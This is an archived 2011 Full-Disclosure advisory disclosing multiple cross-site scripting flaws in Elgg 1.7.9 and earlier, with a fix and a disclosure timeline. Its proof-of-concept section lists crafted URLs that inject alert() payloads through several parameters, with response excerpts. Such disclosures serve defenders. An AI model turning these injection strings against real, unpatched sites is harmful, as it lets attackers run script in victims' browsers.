lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAPYM6VzPiPVZedVifP=jfc_zSRY5T9WWHtZkP-dUSw=efi=Aag@mail.gmail.com> Date: Sat, 30 Jul 2011 22:44:12 +0800 From: YGN Ethical Hacker Group <lists@...g.net> To: full-disclosure <full-disclosure@...ts.grok.org.uk>, secalert@...urityreason.com, bugs@...uritytracker.com, vuln <vuln@...unia.com>, moderators@...db.org, vuln@...urity.nnov.ru, news@...uriteam.com, submissions@...ketstormsecurity.org, bugtraq <bugtraq@...urityfocus.com> Subject: Elgg 1.7.9 <= | Multiple Cross Site Scripting Vulnerabilities Elgg 1.7.9 <= | Multiple Cross Site Scripting Vulnerabilities 1. OVERVIEW The Elgg 1.7.9 and lower versions are vulnerable to multiple Cross Site Scripting. 2. BACKGROUND Elgg is an award-winning social networking engine, delivering the building blocks that enable businesses, schools, universities and associations to create their own fully-featured social networks and applications. Well-known Organizations with networks powered by Elgg include: Australian Government, British Government, Federal Canadian Government, MITRE, The World Bank, UNESCO, NASA, Stanford University, Johns Hopkins University and more (http://elgg.org/powering.php) 3. VULNERABILITY DESCRIPTION Several parameters (page_owner, content,internalname, QUERY_STRING) are not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED Elgg 1.7.9 <= 5. PROOF-OF-CONCEPT/EXPLOIT XSS (Browser All) N.B. User login is required to execute. vulnerable parameters: page_owner, content,internalname, QUERY_STRING ______________________________________________________________________________________________ REQUEST: http://localhost/elgg/mod/file/search.php?subtype=file&page_owner=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f http://localhost/elgg/mod/riverdashboard/?content=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f&callback=true http://localhost/elgg/pg/embed/upload?internalname=%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22 http://localhost/elgg/pg/pages/edit/%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22 XSS (Exploitable in Older versions of Browsers - IE/FF) vulnerable parameters: send_to,container_guid ========================================================= REQUEST: http://localhost/elgg/pg/messages/compose/?send_to=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22s Portion of RESPONSE: <input type="hidden" name="send_to" value="" style="background-image:url(javascript:alert(/XSS/))" x="s" /> REQUEST: http://localhost/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22 Portion of RESPONSE: <input type="hidden" name="container_guid" value="" style="background-image:url(javascript:alert(/XSS/))" x="s" /> 6. SOLUTION Upgrade to 1.7.10 or higher. 7. VENDOR Curverider Ltd http://www.curverider.co.uk/ http://elgg.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-06-09: vulnerability reported 2011-06-14: vendor released fixed version 2011-07-30: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[elgg_179]_cross_site_scripting Project Home: http://elgg.org/ XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-07-30] --------------------------------- Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists